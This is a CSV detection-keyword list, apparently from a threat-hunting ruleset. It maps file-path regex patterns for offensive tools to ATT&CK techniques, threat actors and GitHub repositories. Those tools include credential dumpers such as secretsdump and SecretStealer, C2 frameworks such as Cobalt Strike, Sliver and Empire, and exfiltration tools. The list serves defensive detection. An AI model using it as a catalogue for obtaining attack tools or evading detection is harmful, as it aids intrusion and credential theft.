"*/searchsploit*",".{0,1000}\/searchsploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","10752"
"*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10753"
"*/SeatBelt.exe*",".{0,1000}\/SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10754"
"*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10755"
"*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10756"
"*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10757"
"*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10758"
"*/Seatbelt.git*",".{0,1000}\/Seatbelt\.git.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","10759"
"*/Seatbelt.txt*",".{0,1000}\/Seatbelt\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","10760"
"*/Seatbelt/Commands*",".{0,1000}\/Seatbelt\/Commands.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","10761"
"*/seatbelt_json.py*",".{0,1000}\/seatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10762"
"*/SeAuditPrivilegePoC.exe*",".{0,1000}\/SeAuditPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10763"
"*/SeBackupPrivilege.md*",".{0,1000}\/SeBackupPrivilege\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","10764"
"*/SeBackupPrivilegePoC.exe*",".{0,1000}\/SeBackupPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10765"
"*/secinject.c*",".{0,1000}\/secinject\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","10766"
"*/SecondaryLogonVariant.exe*",".{0,1000}\/SecondaryLogonVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10767"
"*/SecretFinder.git*",".{0,1000}\/SecretFinder\.git.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","10768"
"*/secretsdump.exe*",".{0,1000}\/secretsdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10769"
"*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10770"
"*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","10771"
"*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10772"
"*/secretsdump_*.txt*",".{0,1000}\/secretsdump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10773"
"*/SecretServerSecretStealer.git*",".{0,1000}\/SecretServerSecretStealer\.git.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10774"
"*/SecretServerSecretStealer-master.zip*",".{0,1000}\/SecretServerSecretStealer\-master\.zip.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10775"
"*/secretsmanagerenum.py*",".{0,1000}\/secretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10776"
"*/SecretStealer.ps1*",".{0,1000}\/SecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10777"
"*/SecScanC2.git*",".{0,1000}\/SecScanC2\.git.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","10778"
"*/sec-tools/litefuzz*",".{0,1000}\/sec\-tools\/litefuzz.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","10779"
"*/SeeYouCM-Thief*",".{0,1000}\/SeeYouCM\-Thief.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","10780"
"*/self_delete.cna*",".{0,1000}\/self_delete\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","10781"
"*/self_deletion.exe*",".{0,1000}\/self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10782"
"*/SeManageVolumeExploit.git*",".{0,1000}\/SeManageVolumeExploit\.git.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","10783"
"*/SeriousSam.sln*",".{0,1000}\/SeriousSam\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","10785"
"*/server/c2/*",".{0,1000}\/server\/c2\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","10786"
"*/server/common/stagers.py*",".{0,1000}\/server\/common\/stagers\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","10787"
"*/ServerC2.cpp*",".{0,1000}\/ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","10788"
"*/ServerC2.exe*",".{0,1000}\/ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","10789"
"*/ServerlessRedirector.git*",".{0,1000}\/ServerlessRedirector\.git.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","10790"
"*/servers/dns_server.py*",".{0,1000}\/servers\/dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10791"
"*/servers/icmp_server.py*",".{0,1000}\/servers\/icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10792"
